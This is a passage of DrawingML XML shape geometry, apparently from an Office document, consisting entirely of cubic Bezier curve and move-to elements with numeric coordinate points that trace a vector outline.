                  <a:cubicBezTo>
                    <a:pt x="357" y="312"/>
                    <a:pt x="358" y="311"/>
                    <a:pt x="359" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="314"/>
                    <a:pt x="361" y="314"/>
                    <a:pt x="361" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="314"/>
                    <a:pt x="365" y="314"/>
                    <a:pt x="366" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="319"/>
                    <a:pt x="368" y="320"/>
                    <a:pt x="368" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="322"/>
                    <a:pt x="367" y="322"/>
                    <a:pt x="366" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="324"/>
                    <a:pt x="364" y="324"/>
                    <a:pt x="363" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="325"/>
                    <a:pt x="363" y="325"/>
                    <a:pt x="363" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="326"/>
                    <a:pt x="363" y="328"/>
                    <a:pt x="366" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="325"/>
                    <a:pt x="367" y="324"/>
                    <a:pt x="368" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="325"/>
                    <a:pt x="368" y="325"/>
                    <a:pt x="369" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="326"/>
                    <a:pt x="369" y="326"/>
                    <a:pt x="370" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="327"/>
                    <a:pt x="371" y="328"/>
                    <a:pt x="372" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="329"/>
                    <a:pt x="375" y="329"/>
                    <a:pt x="375" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="328"/>
                    <a:pt x="376" y="328"/>
                    <a:pt x="376" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="327"/>
                    <a:pt x="377" y="326"/>
                    <a:pt x="377" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="326"/>
                    <a:pt x="380" y="323"/>
                    <a:pt x="381" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="323"/>
                    <a:pt x="382" y="323"/>
                    <a:pt x="382" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="323"/>
                    <a:pt x="384" y="324"/>
                    <a:pt x="384" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="326"/>
                    <a:pt x="385" y="329"/>
                    <a:pt x="385" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="331"/>
                    <a:pt x="386" y="331"/>
                    <a:pt x="386" y="331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="331"/>
                    <a:pt x="387" y="330"/>
                    <a:pt x="389" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="330"/>
                    <a:pt x="389" y="330"/>
                    <a:pt x="390" y="332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="333"/>
                    <a:pt x="391" y="332"/>
                    <a:pt x="391" y="332"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="335" y="306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="306"/>
                    <a:pt x="335" y="306"/>
                    <a:pt x="335" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="306"/>
                    <a:pt x="334" y="306"/>
                    <a:pt x="334" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="306"/>
                    <a:pt x="334" y="306"/>
                    <a:pt x="335" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="305"/>
                    <a:pt x="334" y="305"/>
                    <a:pt x="334" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="305"/>
                    <a:pt x="332" y="305"/>
                    <a:pt x="332" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="305"/>
                    <a:pt x="332" y="305"/>
                    <a:pt x="332" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                    <a:pt x="331" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="306"/>
                    <a:pt x="330" y="306"/>
                    <a:pt x="330" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="306"/>
                    <a:pt x="331" y="306"/>
                    <a:pt x="331" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="306"/>
                    <a:pt x="332" y="306"/>
                    <a:pt x="332" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="306"/>
                    <a:pt x="332" y="306"/>
                    <a:pt x="332" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="306"/>
                    <a:pt x="333" y="306"/>
                    <a:pt x="333" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="306"/>
                    <a:pt x="334" y="306"/>
                    <a:pt x="335" y="306"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="304"/>
                    <a:pt x="366" y="304"/>
                    <a:pt x="366" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="304"/>
                    <a:pt x="365" y="304"/>
                    <a:pt x="365" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="303"/>
                    <a:pt x="365" y="303"/>
                    <a:pt x="365" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="302"/>
                    <a:pt x="365" y="302"/>
                    <a:pt x="365" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="301"/>
                    <a:pt x="365" y="301"/>
                    <a:pt x="365" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="301"/>
                    <a:pt x="365" y="301"/>
                    <a:pt x="364" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="301"/>
                    <a:pt x="363" y="301"/>
                    <a:pt x="363" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="301"/>
                    <a:pt x="363" y="302"/>
                    <a:pt x="364" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="303"/>
                    <a:pt x="364" y="303"/>
                    <a:pt x="364" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="304"/>
                    <a:pt x="363" y="304"/>
                    <a:pt x="363" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="305"/>
                    <a:pt x="365" y="305"/>
                    <a:pt x="366" y="305"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="350" y="303"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                    <a:pt x="350" y="303"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="359" y="306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="305"/>
                    <a:pt x="359" y="305"/>
                    <a:pt x="359" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="305"/>
                    <a:pt x="359" y="305"/>
                    <a:pt x="359" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="304"/>
                    <a:pt x="358" y="304"/>
                    <a:pt x="358" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="304"/>
                    <a:pt x="358" y="304"/>
                    <a:pt x="359" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="302"/>
                    <a:pt x="359" y="301"/>
                    <a:pt x="359" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="300"/>
                    <a:pt x="357" y="300"/>
                    <a:pt x="357" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="300"/>
                    <a:pt x="355" y="301"/>
                    <a:pt x="354" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="302"/>
                    <a:pt x="353" y="301"/>
                    <a:pt x="352" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="302"/>
                    <a:pt x="351" y="302"/>
                    <a:pt x="351" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="302"/>
                    <a:pt x="351" y="302"/>
                    <a:pt x="351" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="302"/>
                    <a:pt x="350" y="302"/>
                    <a:pt x="350" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="302"/>
                    <a:pt x="350" y="302"/>
                    <a:pt x="349" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="304"/>
                    <a:pt x="349" y="304"/>
                    <a:pt x="349" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="304"/>
                    <a:pt x="350" y="304"/>
                    <a:pt x="350" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="304"/>
                    <a:pt x="351" y="304"/>
                    <a:pt x="351" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="304"/>
                    <a:pt x="352" y="305"/>
                    <a:pt x="352" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="306"/>
                    <a:pt x="352" y="306"/>
                    <a:pt x="353" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="306"/>
                    <a:pt x="353" y="306"/>
                    <a:pt x="353" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="306"/>
                    <a:pt x="354" y="306"/>
                    <a:pt x="354" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="306"/>
                    <a:pt x="355" y="306"/>
                    <a:pt x="355" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="306"/>
                    <a:pt x="356" y="306"/>
                    <a:pt x="357" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="306"/>
                    <a:pt x="358" y="306"/>
                    <a:pt x="358" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="306"/>
                    <a:pt x="359" y="306"/>
                    <a:pt x="359" y="306"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="352" y="299"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="299"/>
                    <a:pt x="351" y="299"/>
                    <a:pt x="351" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="298"/>
                    <a:pt x="351" y="298"/>
                    <a:pt x="351" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="298"/>
                    <a:pt x="351" y="298"/>
                    <a:pt x="351" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="298"/>
                    <a:pt x="350" y="298"/>
                    <a:pt x="350" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="298"/>
                    <a:pt x="350" y="298"/>
                    <a:pt x="350" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="298"/>
                    <a:pt x="349" y="298"/>
                    <a:pt x="349" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="299"/>
                    <a:pt x="349" y="299"/>
                    <a:pt x="349" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="300"/>
                    <a:pt x="349" y="300"/>
                    <a:pt x="349" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="300"/>
                    <a:pt x="348" y="300"/>
                    <a:pt x="348" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="301"/>
                    <a:pt x="349" y="301"/>
                    <a:pt x="349" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="301"/>
                    <a:pt x="350" y="301"/>
                    <a:pt x="350" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="301"/>
                    <a:pt x="351" y="300"/>
                    <a:pt x="352" y="299"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="348" y="307"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="306"/>
                    <a:pt x="349" y="306"/>
                    <a:pt x="349" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="305"/>
                    <a:pt x="348" y="305"/>
                    <a:pt x="347" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="306"/>
                    <a:pt x="347" y="306"/>
                    <a:pt x="347" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="305"/>
                    <a:pt x="347" y="305"/>
                    <a:pt x="347" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="306"/>
                    <a:pt x="346" y="306"/>
                    <a:pt x="346" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="306"/>
                    <a:pt x="346" y="307"/>
                    <a:pt x="346" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="307"/>
                    <a:pt x="348" y="307"/>
                    <a:pt x="348" y="307"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="348" y="312"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="312"/>
                    <a:pt x="348" y="312"/>
                    <a:pt x="348" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="310"/>
                    <a:pt x="348" y="310"/>
                    <a:pt x="348" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="310"/>
                    <a:pt x="347" y="310"/>
                    <a:pt x="346" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="309"/>
                    <a:pt x="345" y="309"/>
                    <a:pt x="345" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="309"/>
                    <a:pt x="344" y="309"/>
                    <a:pt x="344" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="309"/>
                    <a:pt x="343" y="309"/>
                    <a:pt x="341" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="309"/>
                    <a:pt x="341" y="309"/>
                    <a:pt x="340" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="310"/>
                    <a:pt x="340" y="310"/>
                    <a:pt x="340" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="310"/>
                    <a:pt x="340" y="310"/>
                    <a:pt x="340" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="311"/>
                    <a:pt x="340" y="311"/>
                    <a:pt x="340" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="311"/>
                    <a:pt x="341" y="311"/>
                    <a:pt x="342" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="311"/>
                    <a:pt x="343" y="311"/>
                    <a:pt x="343" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="311"/>
                    <a:pt x="344" y="311"/>
                    <a:pt x="344" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="311"/>
                    <a:pt x="344" y="311"/>
                    <a:pt x="344" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="311"/>
                    <a:pt x="345" y="311"/>
                    <a:pt x="346" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="312"/>
                    <a:pt x="347" y="312"/>
                    <a:pt x="347" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="312"/>
                    <a:pt x="347" y="312"/>
                    <a:pt x="348" y="312"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="338" y="312"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="312"/>
                    <a:pt x="338" y="311"/>
                    <a:pt x="338" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="311"/>
                    <a:pt x="338" y="311"/>
                    <a:pt x="338" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="310"/>
                    <a:pt x="338" y="310"/>
                    <a:pt x="338" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="310"/>
                    <a:pt x="337" y="310"/>
                    <a:pt x="337" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="310"/>
                    <a:pt x="336" y="310"/>
                    <a:pt x="336" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="310"/>
                    <a:pt x="336" y="310"/>
                    <a:pt x="336" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="310"/>
                    <a:pt x="335" y="310"/>
                    <a:pt x="335" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="310"/>
                    <a:pt x="335" y="310"/>
                    <a:pt x="335" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="312"/>
                    <a:pt x="335" y="312"/>
                    <a:pt x="335" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="312"/>
                    <a:pt x="336" y="312"/>
                    <a:pt x="337" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="312"/>
                    <a:pt x="337" y="312"/>
                    <a:pt x="338" y="312"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="346" y="298"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="297"/>
                    <a:pt x="346" y="297"/>
                    <a:pt x="346" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="296"/>
                    <a:pt x="345" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="294"/>
                    <a:pt x="345" y="294"/>
                    <a:pt x="343" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="294"/>
                    <a:pt x="343" y="294"/>
                    <a:pt x="343" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="293"/>
                    <a:pt x="344" y="293"/>
                    <a:pt x="344" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="292"/>
                    <a:pt x="344" y="292"/>
                    <a:pt x="344" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="292"/>
                    <a:pt x="345" y="292"/>
                    <a:pt x="345" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="292"/>
                    <a:pt x="344" y="292"/>
                    <a:pt x="342" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="294"/>
                    <a:pt x="342" y="294"/>
                    <a:pt x="342" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="293"/>
                    <a:pt x="341" y="294"/>
                    <a:pt x="341" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="295"/>
                    <a:pt x="341" y="295"/>
                    <a:pt x="341" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="295"/>
                    <a:pt x="341" y="296"/>
                    <a:pt x="341" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="298"/>
                    <a:pt x="341" y="298"/>
                    <a:pt x="341" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="299"/>
                    <a:pt x="340" y="299"/>
                    <a:pt x="340" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="299"/>
                    <a:pt x="339" y="300"/>
                    <a:pt x="339" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="303"/>
                    <a:pt x="339" y="303"/>
                    <a:pt x="339" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="303"/>
                    <a:pt x="340" y="303"/>
                    <a:pt x="340" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="303"/>
                    <a:pt x="340" y="303"/>
                    <a:pt x="340" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="303"/>
                    <a:pt x="341" y="303"/>
                    <a:pt x="342" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="301"/>
                    <a:pt x="342" y="301"/>
                    <a:pt x="342" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="299"/>
                    <a:pt x="345" y="299"/>
                    <a:pt x="345" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="298"/>
                    <a:pt x="346" y="298"/>
                    <a:pt x="346" y="298"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="328" y="304"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="303"/>
                    <a:pt x="326" y="301"/>
                    <a:pt x="326" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="301"/>
                    <a:pt x="325" y="301"/>
                    <a:pt x="325" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="301"/>
                    <a:pt x="325" y="301"/>
                    <a:pt x="325" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="301"/>
                    <a:pt x="324" y="302"/>
                    <a:pt x="323" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="302"/>
                    <a:pt x="322" y="304"/>
                    <a:pt x="321" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="304"/>
                    <a:pt x="319" y="304"/>
                    <a:pt x="319" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="303"/>
                    <a:pt x="318" y="303"/>
                    <a:pt x="317" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="303"/>
                    <a:pt x="317" y="303"/>
                    <a:pt x="317" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="303"/>
                    <a:pt x="315" y="304"/>
                    <a:pt x="315" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="306"/>
                    <a:pt x="315" y="306"/>
                    <a:pt x="315" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="306"/>
                    <a:pt x="315" y="306"/>
                    <a:pt x="315" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="307"/>
                    <a:pt x="314" y="308"/>
                    <a:pt x="314" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="308"/>
                    <a:pt x="314" y="308"/>
                    <a:pt x="314" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="309"/>
                    <a:pt x="313" y="309"/>
                    <a:pt x="313" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="309"/>
                    <a:pt x="313" y="309"/>
                    <a:pt x="313" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="310"/>
                    <a:pt x="311" y="312"/>
                    <a:pt x="315" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="313"/>
                    <a:pt x="315" y="313"/>
                    <a:pt x="315" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="314"/>
                    <a:pt x="314" y="315"/>
                    <a:pt x="314" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="317"/>
                    <a:pt x="314" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="318"/>
                    <a:pt x="316" y="318"/>
                    <a:pt x="316" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="317"/>
                    <a:pt x="316" y="317"/>
                    <a:pt x="316" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="316"/>
                    <a:pt x="316" y="316"/>
                    <a:pt x="316" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="314"/>
                    <a:pt x="317" y="314"/>
                    <a:pt x="317" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="313"/>
                    <a:pt x="317" y="311"/>
                    <a:pt x="317" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="309"/>
                    <a:pt x="319" y="309"/>
                    <a:pt x="319" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="310"/>
                    <a:pt x="319" y="310"/>
                    <a:pt x="319" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="312"/>
                    <a:pt x="319" y="312"/>
                    <a:pt x="319" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="312"/>
                    <a:pt x="319" y="312"/>
                    <a:pt x="319" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="313"/>
                    <a:pt x="321" y="313"/>
                    <a:pt x="322" y="313"/>
                  </a:cubicBezTo>
